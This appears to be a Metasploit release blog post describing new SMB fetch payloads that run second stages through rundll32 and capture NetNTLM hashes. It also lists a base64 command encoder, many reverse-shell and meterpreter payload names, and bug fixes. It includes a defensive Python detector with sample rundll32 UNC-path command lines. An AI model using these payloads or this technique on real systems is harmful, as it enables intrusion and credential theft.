Last updated at Fri, 23 Feb 2024 21:39:12 GMT

New Fetch Payload

It has been almost a year since Metasploit released the new fetch payloads, and since then 43 of the 79 exploit modules support fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has extended the protocol support to SMB, allowing payloads to be run using rundll32, which has the added benefit of capturing the requester's NetNTLM hash.

This also simplifies the workflow users previously had of running the exploit/windows/smb/smb_delivery module and then copying the generated command into another exploit. Now, users can simply select an SMB-enabled fetch payload and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 was merged into Metasploit, multiple SMB services can run at the same time. This means multiple SMB-enabled fetch payloads can each run their own independent handler simultaneously.
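From the defender's side, the telemetry that corresponds to an SMB fetch payload is rundll32 being launched with a UNC path to a DLL as its argument. The detection logic below is an added example, not Metasploit code; it assumes process-creation events that expose the image name and command line, assumes the argument takes the form of a UNC path to a DLL (the form Metasploit's smb_delivery module has generated), and runs over constructed sample events.

```python
import re

# Constructed sample process-creation events (image, command line).
# These are not real telemetry and not taken from the release notes.
SAMPLE_EVENTS = [
    ("rundll32.exe", r"rundll32.exe \\10.0.0.5\share\fetch.dll,0"),
    ("rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
    ("rundll32.exe", r'rundll32.exe "\\fs01.corp.example\netlogon\agent.dll",Start'),
    ("rundll32.exe", r"rundll32.exe //10.0.0.5/share/fetch.dll,0"),
    ("cmd.exe", r"cmd.exe /c dir \\10.0.0.5\share"),
]

# A UNC path (backslash or forward-slash form, optionally quoted) ending
# in .dll, followed by the comma that separates the DLL from its entry point.
UNC_DLL = re.compile(
    r'"?(?:\\\\|//)(?P<host>[^\\/\s"]+)[\\/][^\s",]+?\.dll"?\s*,',
    re.IGNORECASE,
)


def remote_dll_host(image, cmdline):
    """Return the UNC host when rundll32 loads its DLL from a network
    share, otherwise None (non-rundll32 images are ignored)."""
    if image.lower().rsplit("\\", 1)[-1] != "rundll32.exe":
        return None
    match = UNC_DLL.search(cmdline)
    return match.group("host") if match else None


def find_remote_rundll32(events, known_shares=()):
    """Flag rundll32 launches loading a DLL over SMB from a host that is
    not in the allowlist of known share hosts. Returns (host, cmdline)."""
    allowed = {h.lower() for h in known_shares}
    hits = []
    for image, cmdline in events:
        host = remote_dll_host(image, cmdline)
        if host and host.lower() not in allowed:
            hits.append((host, cmdline))
    return hits


if __name__ == "__main__":
    for host, cmd in find_remote_rundll32(SAMPLE_EVENTS, ["fs01.corp.example"]):
        print(f"rundll32 loading DLL over SMB from {host}: {cmd}")
```

The allowlist keeps legitimate DLL loads from sanctioned file servers out of the alert queue; the SMB connection itself is also visible as an outbound port 445 session from the host running rundll32.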

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that uses base64 encoding to escape bad characters in ARCH_CMD payloads for Linux and UNIX platforms.

SMB Fetch, Windows Shellcode Stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf stephen_fewer@harmonysecurity.com
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch payload service and a new payload that uses it. The payload invokes rundll32, but handles everything automatically for the user.

This adapter adds the following payloads:

  • cmd/windows/smb/x64/custom/bind_ipv6_tcp
  • cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/custom/bind_named_pipe
  • cmd/windows/smb/x64/custom/bind_tcp
  • cmd/windows/smb/x64/custom/bind_tcp_rc4
  • cmd/windows/smb/x64/custom/bind_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_http
  • cmd/windows/smb/x64/custom/reverse_http
  • cmd/windows/smb/x64/custom/reverse_named_pipe
  • cmd/windows/smb/x64/custom/reverse_tcp
  • cmd/windows/smb/x64/custom/reverse_tcp_rc4
  • cmd/windows/smb/x64/custom/reverse_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_winhttp
  • cmd/windows/smb/x64/custom/reverse_winhttp
  • cmd/windows/smb/x64/encrypted_shell/reverse_tcp
  • cmd/windows/smb/x64/encrypted_shell_reverse_tcp
  • cmd/windows/smb/x64/exec
  • cmd/windows/smb/x64/loadlibrary
  • cmd/windows/smb/x64/messagebox
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/bind_named_pipe
  • cmd/windows/smb/x64/meterpreter/bind_tcp
  • cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_http
  • cmd/windows/smb/x64/meterpreter/reverse_http
  • cmd/windows/smb/x64/meterpreter/reverse_named_pipe
  • cmd/windows/smb/x64/meterpreter/reverse_tcp
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_winhttp
  • cmd/windows/smb/x64/meterpreter/reverse_winhttp
  • cmd/windows/smb/x64/meterpreter_bind_named_pipe
  • cmd/windows/smb/x64/meterpreter_bind_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_http
  • cmd/windows/smb/x64/meterpreter_reverse_http
  • cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/peinject/bind_named_pipe
  • cmd/windows/smb/x64/peinject/bind_tcp
  • cmd/windows/smb/x64/peinject/bind_tcp_rc4
  • cmd/windows/smb/x64/peinject/bind_tcp_uuid
  • cmd/windows/smb/x64/peinject/reverse_named_pipe
  • cmd/windows/smb/x64/peinject/reverse_tcp
  • cmd/windows/smb/x64/peinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/peinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/pingback_reverse_tcp
  • cmd/windows/smb/x64/powershell_bind_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp_ssl
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/shell/bind_named_pipe
  • cmd/windows/smb/x64/shell/bind_tcp
  • cmd/windows/smb/x64/shell/bind_tcp_rc4
  • cmd/windows/smb/x64/shell/bind_tcp_uuid
  • cmd/windows/smb/x64/shell/reverse_tcp
  • cmd/windows/smb/x64/shell/reverse_tcp_rc4
  • cmd/windows/smb/x64/shell/reverse_tcp_uuid
  • cmd/windows/smb/x64/shell_bind_tcp
  • cmd/windows/smb/x64/shell_reverse_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/vncinject/bind_named_pipe
  • cmd/windows/smb/x64/vncinject/bind_tcp
  • cmd/windows/smb/x64/vncinject/bind_tcp_rc4
  • cmd/windows/smb/x64/vncinject/bind_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_http
  • cmd/windows/smb/x64/vncinject/reverse_http
  • cmd/windows/smb/x64/vncinject/reverse_tcp
  • cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_winhttp
  • cmd/windows/smb/x64/vncinject/reverse_winhttp

Enhancements and features (7)

  • #18706 from sjanusz-r7 - Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is hidden behind a feature flag that can be enabled with features set postgres_session_type true.
  • #18747 from zgoldman-r7 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option, used to control whether an interactive MSSQL session is opened. This functionality is currently hidden behind a feature flag that can be enabled with features set mssql_session_type true.
  • #18759 from cgranleese-r7 - Updates multiple MySQL modules to work with a supplied MySQL session instead of opening a new connection. This functionality is hidden behind a feature flag that can be enabled with features set mysql_session_type true.
  • #18763 from zgoldman-r7 - Updates multiple MSSQL modules to now work with the new MSSQL session type, enabled with features set mssql_session_type true.
  • #18806 from cgranleese-r7 - Improves the handling of unknown commands by suggesting similar valid commands.
  • #18809 from zeroSteiner - Makes multiple improvements to the dns command, a new command that mimics /etc/resolv.conf and /etc/hosts. This functionality is currently hidden behind a feature flag that can be enabled with features set dns_feature true in msfconsole.
  • #18825 from cgranleese-r7 - Improves the error message shown when the current session is incompatible with a post module.

Bugs fixed (13)

  • #18616 from adfoster-r7 - Fixes an issue where the AARCH64 SO ELF template caused a SIGBUS exception.
  • #18774 from adfoster-r7 - Updates the following modules to now work with newer versions of sqlcmd:
    post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
  • #18786 from lihe07 - Fixes an option name conflict in exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
  • #18795 from cgranleese-r7 - Moves the CreateSession option from the module's advanced options to its basic options in order to increase discoverability.
  • #18798 from upsidedwn - This fixes an issue in the check method of the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module that caused the version comparison to fail.
  • #18799 from upsidedwn - This fixes an issue in the check method of the exploit/windows/local/cve_2020_17136 module that caused the version comparison to fail.
  • #18800 from upsidedwn - This fixes an issue in the check method of the exploit/windows/local/cve_2021_40449 module that caused the version comparison to fail.
  • #18801 from upsidedwn - This fixes an issue in the check method of the exploit/windows/local/cve_2022_26904_superprofile module that caused the version comparison to fail.
  • #18812 from adfoster-r7 - Reverts the auxiliary/scanner/mssql/mssql_login module's TDSENCRYPTION default value to false.
  • #18813 from adfoster-r7 - Fixes a crash when running the help services or help hosts commands.
  • #18823 from cdelafuente-r7 - Fixes the module metadata platform list comparison.
  • #18826 from dwelch-r7 - Fixes a regression where the windows/smb/psexec module did not correctly run its cleanup logic.
  • #18828 from dwelch-r7 - Fixes a crash when an exploit module uses nops.

Documentation

You can find the latest Metasploit documentation on our website at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro.